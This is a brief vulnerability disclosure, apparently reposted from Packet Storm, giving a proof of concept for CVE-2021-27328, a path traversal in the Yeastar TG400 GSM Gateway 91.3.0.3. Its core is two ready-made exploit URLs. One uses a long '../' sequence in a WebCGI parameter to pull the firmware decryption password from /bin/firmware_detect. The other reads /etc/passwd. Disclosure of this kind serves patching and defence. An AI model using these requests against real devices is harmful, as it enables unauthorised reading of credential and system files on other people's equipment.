Yeastar TG400 GSM Gateway 91.3.0.3 Path Traversal

Yeastar TG400 GSM Gateway version 91.3.0.3 suffers from a path traversal vulnerability.


MD5 | a467c9ff54325292a1cc919f562ee67f

Download
Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3

This is a Proof of Concept for CVE-2021-27328
Example

    to get firmware decrypting password

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

    to get /etc/paswd

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd



Source: packetstormsecurity.com
Related Posts